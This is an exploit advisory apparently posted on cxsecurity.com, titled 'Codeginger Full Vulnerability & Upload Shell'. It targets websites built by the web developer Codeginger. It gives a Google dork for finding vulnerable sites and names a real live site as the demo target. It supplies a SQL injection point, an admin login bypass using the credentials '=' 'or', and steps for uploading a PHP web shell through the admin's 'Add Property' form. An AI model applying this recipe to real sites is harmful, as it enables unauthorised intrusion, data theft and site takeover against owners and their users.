Codeginger Full Vulnerability & Upload Shell

2016.08.06
ir MrHoudini (IR) ir
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title : Codeginger Full Vulnerability & Upload Shell # Google Dork : intext:"Design & Developed by Codeginger" # Discovered By : MrHoudini # Contact Me : Mr.Houdini77@Gmail.com # My WebSite : http://www.MrHoudini.ir # Date : 5-8-2016 # Vendor Hompage : http://www.codeginger.com/ # Tested On : Windows Poc : SQL Injection : Demo : http://ajmeraproperty.com/product-details.php?id=548 Admin Page Bypass : http://ajmeraproperty.com/admin/ Upload Shell : Login as Admin and the click on "Add Property" Then Upload Your Shell as : shell.php Username : '=' 'or' Password : '=' 'or'


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top